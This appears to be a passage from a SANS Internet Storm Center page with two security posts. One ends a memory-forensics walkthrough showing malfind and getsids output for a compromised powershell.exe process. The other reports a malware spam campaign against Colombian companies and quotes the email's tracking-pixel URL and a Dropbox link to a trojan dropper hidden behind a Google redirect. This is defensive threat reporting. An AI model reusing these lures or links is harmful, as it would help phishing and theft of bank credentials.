Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 216, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x06400000  4d 5a e8 00 00 00 00 5b 52 45 55 89 e5 81 c3 d0   MZ.....[REU.....
Process: powershell.exe Pid: 1284 Address: 0x4ff0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 33, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x04ff0000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
Suspicious new getsids entries
===========================================================================
 
powershell.exe (1284): S-1-5-21-1828531342-1736868966-1560356964-513 (Domain Users)
powershell.exe (1284): S-1-1-0 (Everyone)
powershell.exe (1284): S-1-5-114
powershell.exe (1284): S-1-5-32-544 (Administrators)
powershell.exe (1284): S-1-5-32-545 (Users)
powershell.exe (1284): S-1-5-4 (Interactive)
powershell.exe (1284): S-1-2-1 (Console Logon (Users who are logged onto the physical console))
powershell.exe (1284): S-1-5-11 (Authenticated Users)
powershell.exe (1284): S-1-5-15 (This Organization)
powershell.exe (1284): S-1-5-113
powershell.exe (1284): S-1-5-5-0-194227 (Logon Session)
powershell.exe (1284): S-1-2-0 (Local (Users with the ability to log in locally))
powershell.exe (1284): S-1-5-64-10 (NTLM Authentication)
powershell.exe (1284): S-1-16-12288 (High Mandatory Level) 
Yep, powershell.exe definitely did it. :-) Great memory analysis tool from Houcem Hachicha (@aim4r). Give it a try!
Pop quiz: Under the malfind results, in the ASCII readable output dumped from the hex, what jumps out at you? First right answer to @sans_isc and @holisticinfosec in the same Tweet, one per reader, wins some insignificant yet enjoyable schwag.
Cheers!
0 Comments
Massive malware spam campain to corporate domains in Colombia
There was a massive malware spam campain directed to corporate domains in Colombia. The following was the e-mail received:

Now this e-mail has two interesting aspects:
- It is tracking if the user reads the message using the google analytics API by invoking the following:
	img src=3Dhttp://www.google-analytics.com/c= ollect?v=3D1&tid=3DUA-62115737-1&[email protected]&t=3De= vent&[email protected]&ea=3Dopens&[email protected]&cs=3Dnewsletter&cm=3Demail&cn=3D062413&cm1=3D1?/ 
- It has a link to a dropbox file being masqueraded with the google url redirection script:
	https://www.google.com/url?q=3Dhttps%3A%2F%= 2Fwww.dropbox.com%2Fs%2Fvs5hho625v7ibw5%2FACH=5Ftransaction5721.doc%3Fdl%3D= 1&sa=3DD&sntz=3D1&usg=3DAFQjCNFADf1fsGqdWqwSOnMC6XyLMHrL2w 
When opened, this document has embedded a visual basic script that downloads a known trojan password stealer designed for colombian banks.
This domain uses a private registation service, avoiding to know the identity of the registrar:

Be careful when opening unknown e-mails. You could be leaking information and compromising your computer, even when you see google domain in the URLs.
Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org
6 Comments




























 
              
0 Comments